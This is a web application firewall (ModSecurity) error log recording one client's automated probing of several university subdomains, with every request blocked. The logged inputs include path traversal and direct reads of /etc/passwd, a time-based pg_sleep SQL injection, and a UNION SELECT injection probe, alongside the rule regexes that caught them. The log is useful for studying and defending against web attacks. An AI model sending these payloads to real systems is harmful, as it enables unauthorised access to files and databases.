[Tue Aug 29 11:37:07.631888 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IQ0AAAAI"]
[Tue Aug 29 11:37:07.641175 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAUbhGUAAABQ"]
[Tue Aug 29 11:37:07.708155 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IRAAAAAI"]
[Tue Aug 29 11:37:07.709579 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW7FKUAAAAE"]
[Tue Aug 29 11:37:07.939980 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAWdsooAAAAM"]
[Tue Aug 29 11:37:09.410776 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAUFdmkAAAA9"]
[Tue Aug 29 11:37:09.436019 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAUFdmoAAAA9"]
[Tue Aug 29 11:37:09.450622 2023] [:error] [pid 1468] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW85hUAAAAH"]
[Tue Aug 29 11:37:09.509677 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAUbhHYAAABQ"]
[Tue Aug 29 11:37:09.528388 2023] [:error] [pid 1468] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW85hcAAAAH"]
[Tue Aug 29 11:37:15.381029 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11@8Co-f0AAAXA9WMAAAAO"]
[Tue Aug 29 11:37:16.450656 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWdstcAAAAM"]
[Tue Aug 29 11:37:16.461710 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAUbhKoAAABQ"]
[Tue Aug 29 11:37:16.500727 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWdstkAAAAM"]
[Tue Aug 29 11:37:16.517277 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXA9W0AAAAO"]
[Tue Aug 29 11:37:16.540401 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAWdstsAAAAM"]
[Tue Aug 29 11:37:16.596457 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAW9IWkAAAAI"]
[Tue Aug 29 11:37:16.618560 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXA9XIAAAAO"]
[Tue Aug 29 11:37:16.619093 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWuq@EAAAAZ"]
[Tue Aug 29 11:37:16.652654 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/download.php"] [unique_id "ZO11-MCo-f0AAAWuq@IAAAAZ"]
[Tue Aug 29 11:37:16.652784 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAXA9XMAAAAO"]
[Tue Aug 29 11:37:16.655819 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAW9IWwAAAAI"]
[Tue Aug 29 11:37:16.669003 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWdsuEAAAAM"]
[Tue Aug 29 11:37:16.687845 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAWdsuIAAAAM"]
[Tue Aug 29 11:37:16.692743 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXA9XUAAAAO"]
[Tue Aug 29 11:37:16.695631 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAW9IW4AAAAI"]
[Tue Aug 29 11:37:18.812297 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-sCo-f0AAAXA9ZcAAAAO"]
[Tue Aug 29 11:37:25.381723 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12BcCo-f0AAAW51eIAAAAF"]
[Tue Aug 29 11:37:25.384209 2023] [:error] [pid 1473] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO12BcCo-f0AAAXBl@QAAAAP"]
[Tue Aug 29 11:37:27.381698 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXK558AAAAY"]
[Tue Aug 29 11:37:27.384090 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXQJ6kAAAAj"]
[Tue Aug 29 11:37:27.463451 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAW51e0AAAAF"]
[Tue Aug 29 11:37:27.466489 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXEH2EAAAAN"]
